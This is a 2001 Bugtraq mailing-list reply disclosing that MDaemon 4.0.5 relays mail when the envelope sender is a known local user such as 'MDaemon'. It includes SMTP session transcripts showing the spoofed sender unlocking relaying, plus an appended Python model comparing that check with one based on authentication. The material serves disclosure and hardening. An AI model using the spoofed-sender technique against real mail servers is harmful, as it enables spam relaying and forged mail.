[22297] in bugtraq
Re: Relaying in MDaemon
daemon@ATHENA.MIT.EDU (Tabor J. Wells)
Fri Aug 17 20:00:38 2001
Date: Fri, 17 Aug 2001 18:26:40 -0400
From: "Tabor J. Wells" <twells@fsckit.net>
To: Arvel Hathcock <arvel@altn.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010817182640.E7879@fsckit.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <008d01c12734$2b716940$0100a8c0@arvel>

On Fri, Aug 17, 2001 at 10:49:04AM -0500,
Arvel Hathcock <arvel@altn.com> is thought to have said:
> > It seems like that Mdaemon SMTP server can be used for
> > unauthorized relaying. Mail can be relayed when sent
> > "FROM or TO known user", it means that mail sent "from"
> > the account of one of served domains always can be relayed.
> > There is no problem to specify any "from" user, for
> > example, system account "mdaemon".
>
> Please read the manual. There are ways of verifying addresses. Also, the
> default installation does not allow mail relaying. You have enabled it
> yourself. There is a switch setting that prevents this sort of thing and it
> is set by default.
Perhaps you should go download your product from your website and try this
yourself rather than just claiming the original poster didn't read the
documentation. I just downloaded a trial version of 4.0.5 and it relays
out of the box.

If the envelope from you provide matches a valid user (and MDaemon is the
default installed server user) at the local domain then you can relay.

And here I had been wondering why I was getting so much spam through
MDaemon servers that the various open relay blacklists were claiming were
secure. Slightly edited examples follow.

Tabor

A random invalid user fails:
220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:35 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<blah@example.com>
250 <blah@example.com>, Sender ok
rcpt to:<twells@fsckit.net>
550 <twells@fsckit.net>, Recipient unknown
quit
221 See ya in cyberspace

A known valid user succeeds:
220 example.com ESMTP MDaemon 4.0.5 UNREGISTERED; Fri, 17 Aug 2001 18:11:52 -0400
ehlo blah
250-example.com Hello blah, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
mail from:<MDaemon@example.com>
250 <MDaemon@example.com>, Sender ok
rcpt to:<twells@fsckit.net>
250 <twells@fsckit.net>, Recipient ok
data
354 Enter mail, end with <CRLF>.<CRLF>
From: mdaemon@example.com
To: twells@fsckit.net
Subject: Relay Test

Blah
.
250 Ok, message saved
quit
221 See ya in cyberspace

And the relayed message it sends:
From mdaemon@example.com Fri Aug 17 18:09:32 2001
Received: from host.example.com (fsckit.net) [IP Removed]
	by pulse.fsckit.net with esmtp (Exim)
	for twells@fsckit.net
	id 15Xro4-0002VN-00; Fri, 17 Aug 2001 18:09:32 -0400
Received: from blah [IP removed]
	by example.com [223.1.1.128]
	with SMTP (MDaemon.PRO.v4.0.5.T)
	for <twells@fsckit.net>; Fri, 17 Aug 2001 18:08:55 -0400
From: mdaemon@example.com
To: twells@fsckit.net
Subject: Relay Test
X-MDRemoteIP: [IP removed]
X-Return-Path: mdaemon@example.com
X-MDaemon-Deliver-To: twells@fsckit.net
Message-Id: <E15Xro4-0002VN-00@pulse.fsckit.net>
Date: Fri, 17 Aug 2001 18:09:32 -0400
Status: RO
Content-Length: 6
Lines: 2

Blah

--
--------------------------------------------------------------------
Tabor J. Wells twells@fsckit.net
Fsck It! Just another victim of the ambient morality
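
Added example, not part of the original message and not MDaemon's code: a small model of the relay decision the two transcripts above exhibit (a known local envelope sender unlocks relaying) next to a policy that ignores MAIL FROM and keys on SMTP AUTH or a trusted client network. The user list, trusted network, client IP and all function names are assumptions constructed for the illustration.

```python
import ipaddress
from dataclasses import dataclass

# Constructed values for illustration; not taken from any real configuration.
LOCAL_DOMAIN = "example.com"
LOCAL_USERS = {"mdaemon", "alice"}
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]

@dataclass
class Session:
    client_ip: str
    authenticated: bool  # True only after a successful SMTP AUTH
    mail_from: str       # envelope sender, chosen freely by the client
    rcpt_to: str

def split_addr(addr):
    local, _, domain = addr.strip("<>").rpartition("@")
    return local.lower(), domain.lower()

def is_local_user(addr):
    local, domain = split_addr(addr)
    return domain == LOCAL_DOMAIN and local in LOCAL_USERS

def local_delivery(s):
    """Reply code for mail addressed to our own domain, else None."""
    if split_addr(s.rcpt_to)[1] != LOCAL_DOMAIN:
        return None
    return "250" if is_local_user(s.rcpt_to) else "550"

def relay_by_sender(s):
    """Policy seen in the transcripts: a known MAIL FROM unlocks relaying."""
    code = local_delivery(s)
    if code:
        return code
    return "250" if is_local_user(s.mail_from) else "550"

def relay_by_client(s):
    """Hardened policy: only SMTP AUTH or a trusted network unlocks relaying."""
    code = local_delivery(s)
    if code:
        return code
    ip = ipaddress.ip_address(s.client_ip)
    trusted = any(ip in net for net in TRUSTED_NETS)
    return "250" if s.authenticated or trusted else "550"

if __name__ == "__main__":
    spoofed = Session("203.0.113.7", False, "<MDaemon@example.com>", "<twells@fsckit.net>")
    print("sender-based:", relay_by_sender(spoofed))
    print("client-based:", relay_by_client(spoofed))
```

The envelope sender is supplied by the connecting client, so the second policy treats it as untrusted input and never consults it when deciding whether to relay.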